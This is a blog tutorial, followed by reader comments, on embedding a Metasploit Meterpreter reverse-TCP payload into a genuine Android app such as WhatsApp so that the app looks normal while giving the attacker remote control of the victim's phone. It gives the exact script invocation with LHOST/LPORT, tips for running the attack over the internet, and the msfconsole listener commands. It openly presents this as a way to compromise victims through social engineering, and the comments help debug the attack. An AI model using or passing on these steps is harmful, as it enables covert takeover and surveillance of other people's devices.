Embed a Metasploit Payload in an Original .apk File | Part 1 – The Easy Way

Hi Fellas! I’m sure most of you, or at least those who have set a foot in the kingdom of hacking, have heard of Metasploit. Don’t be disappointed if you haven’t, because you’re in the right track.

From Wikipedia,

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

In a more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is,  it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload in the victims phone by any means [Usually involving Social Engineering], and when the victim runs the application, we would get a direct connection to that phone remotely and we can use it to wreak havoc on it.

But since the payload app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.

Here’s where this tutorial comes in. I’m gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly as the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.

PRE-REQUISTICS:

Just to be clear,  In this tutorial the operating system used is Kali Linux, which is a de facto standard OS for Penetration Testing (Read, hacking). You should also install the latest version of ‘ApkTool’ and some libraries for the scripts to work properly.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

STEP 1:

First of all grab the original apk from any of the numerous websites available. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder, in this tutorial I will use the Root folder and a WhatApp.apk as example.

STEP 2:

Download the Ruby script from this link and save it in the same folder as that of the original apk.

STEP 3:

Open a terminal, and type the following command:

ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.

NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You also may need to forward the port you’re using for this attack to work properly.

Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.

Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and from there, note the name of that Activity.

At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.

This is the hardest step of all, so I’m posting some screenshots to make your life easier.

Screenshot from 2015-12-12 01-44-01Screenshot from 2015-12-12 01-43-27

PROFIT?!:

If you did everything correctly, you should now get a apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run just like the original app.

As for the listener, you should use multi/handler and set the corresponding options accordingly. Just run the following commands.

msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Now wait for the victim to run the app, when he does it, you will get a Meterpreter prompt in the terminal!

Screenshot from 2015-12-18 14:32:55

NOTE:

You must have noticed I haven’t explained anything, rather asked you to blindly follow. As none of us wants to be a script-kiddie, we will learn how to do this manually in the next article. To be honest, I didn’t know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us set that story apart for another article.

If you face any problem, don’t forget to mention it in the comments. I’ll try to help you in any way I can.

CREDITS:

I found the script from the comments section of a thread in NullByte, so thanks to the guy who shared it, I’m sorry I don’t remember which thread it was or who the guy was. And credit of making this script goes to timwr and Jack64.

29 Replies to “Embed a Metasploit Payload in an Original .apk File | Part 1 – The Easy Way”

  1. Another way to get the entry point without parsing AndroidManifest.xml is using aapt:

    aapt d badging $APKFILE | grep “package:.*name=” | egrep -o “name='[^’]+'” | cut -f 2 -d ‘=’ | tr -d “‘”

  2. Was looking for this long Time….Googled 1000 times Thanks a Lot Boss

    and i have one doubt ..

    Does the payload fails if the victim uninstalls the app

    Thanks

    1. You’re welcome! 😀

      The payload won’t work anymore if the victim uninstalls the app. Actually the payload is active only when the app is running (whether on the screen or in the background).

  3. Hey Guys,
    I need some help, I am stuck at installing liberaries, when I did this in terminal:
    apt-get install lib32stdc++6 lib32ncurses5 lib32z1

    The response I got was:
    ———————————————————
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    Package lib32ncurses5 is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source

    Package lib32stdc++6 is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source

    Package lib32z1 is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source

    E: Package ‘lib32stdc++6’ has no installation candidate
    E: Package ‘lib32ncurses5’ has no installation candidate
    E: Package ‘lib32z1’ has no installation candidate
    —————————————————————

    So I did this:
    (I am the root user, so not using sudo)

    dpkg –add-architecture i386
    apt-get update
    apt-get install lib32stdc++6 lib32ncurses5 lib32z1

    but still, no luck. Stuck at the same response.
    I also tried:
    apt-get install lib32stdc++6:i386 lib32ncurses5:i386 lib32z1:i386

    In short, I have tried everything that is there on the forums.
    Please help me fellas!

  4. Hey Guys,
    Need some help, I am stuck at installing libraries, viz:
    apt-get install lib32stdc++6 lib32ncurses5 lib32z1

    The response I get is:
    —————————————-
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    Package lib32ncurses5 is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source

    Package lib32stdc++6 is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source

    Package lib32z1 is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source

    E: Package ‘lib32stdc++6’ has no installation candidate
    E: Package ‘lib32ncurses5’ has no installation candidate
    E: Package ‘lib32z1’ has no installation candidate
    —————————————-

    So I tried this:
    (being root user, not using sudo)

    dpkg –add-architecture i386
    apt-get update
    apt-get install lib32stdc++6 lib32ncurses5 lib32z1

    But no luck..same response.

    I also tried:
    apt-get install lib32stdc++6:i386 lib32ncurses5:i386 lib32z1:i386

    Still same response.

    In short, I tried everything that is out there in the forums.
    Please help me fellas!

  5. when i tried to run the following command

    root@aaronstoneuk:~# ruby /root/vlc/apk-embed-payload.rb /root/vlc/org.videolan.vlc.betav7neon.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=447
    [-] Apktool version Apktool v1.5.2 – a tool for reengineering Android apk files
    Copyright 2010 Ryszard Wiśniewski
    with smali v1.4.1, and baksmali v1.4.1
    Updated by @iBotPeaches
    Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0)

    Usage: apktool [-q|–quiet OR -v|–verbose] COMMAND […]

    COMMANDs are:

    d[ecode] [OPTS] []
    Decode to .

    OPTS:

    -s, –no-src
    Do not decode sources.
    -r, –no-res
    Do not decode resources.
    -d, –debug
    Decode in debug mode. Check project page for more info.
    -b, –no-debug-info
    Baksmali — don’t write out debug info (.local, .param, .line, etc.)
    -f, –force
    Force delete destination directory.
    -t , –frame-tag
    Try to use framework files tagged by .
    –frame-path
    Use the specified directory for framework files
    –keep-broken-res
    Use if there was an error and some resources were dropped, e.g.:
    “Invalid config flags detected. Dropping resources”, but you
    want to decode them anyway, even with errors. You will have to
    fix them manually before building.

    b[uild] [OPTS] [] []
    Build an apk from already decoded application located in .

    It will automatically detect, whether files was changed and perform
    needed steps only.

    If you omit then current directory will be used.
    If you omit then /dist/
    will be used.

    OPTS:

    -f, –force-all
    Skip changes detection and build all files.
    -d, –debug
    Build in debug mode. Check project page for more info.
    -a, –aapt
    Loads aapt from specified location.

    if|install-framework [] –frame-path []
    Install framework file to your system.

    For additional info, see: http://code.google.com/p/android-apktool/
    For smali/baksmali info, see: http://code.google.com/p/smali/
    not supported, please download the latest 2. version from git.
    root@aaronstoneuk:~#

    can you please tell me what i am doing wrong.
    ps: all the path names given are correct and the libraries and apktool are up to date.

  6. I ran the script and it ran completely thru, but at the end all i get is an original.apk and a decompiled original folder, along with a payload.apk and its decompiled payload folder. The script did not make a backdoor_app.apk and it did not ask in terminal to pick a hook.

  7. Hi,
    I am facing bellow error please help.
    root@kali:~/Desktop/Task5# apktool b original
    I: Using Apktool 2.2.0-dirty
    I: Checking whether sources has changed…
    I: Smaling smali folder into classes.dex…
    original/smali/com/facebook/lite/MainActivity.smali[522,4] Invalid register: v22. Must be between v0 and v15, inclusive.
    Exception in thread “main” brut.androlib.AndrolibException: Could not smali file: com/facebook/lite/MainActivity.smali
    at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:67)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:51)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:38)
    at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:400)
    at brut.androlib.Androlib.buildSources(Androlib.java:331)
    at brut.androlib.Androlib.build(Androlib.java:287)
    at brut.androlib.Androlib.build(Androlib.java:263)
    at brut.apktool.Main.cmdBuild(Main.java:224)
    at brut.apktool.Main.main(Main.java:84)

    Thanks!

  8. I made a bash script to help improving your script
    And I made an auto msf listner , with auto hosting apk app
    But when I downloaded it from victim’s phone
    it say to me ” Problem with package! ”
    There is a mistake in ruby script !
    Any help !!!

    1. hey i have done everything correctly , u have done a wonderfull job with this explanation kudos , but the app is crashing after we install it is it that im using MIUI OS or what im confused

Leave a Reply

Your email address will not be published. Required fields are marked *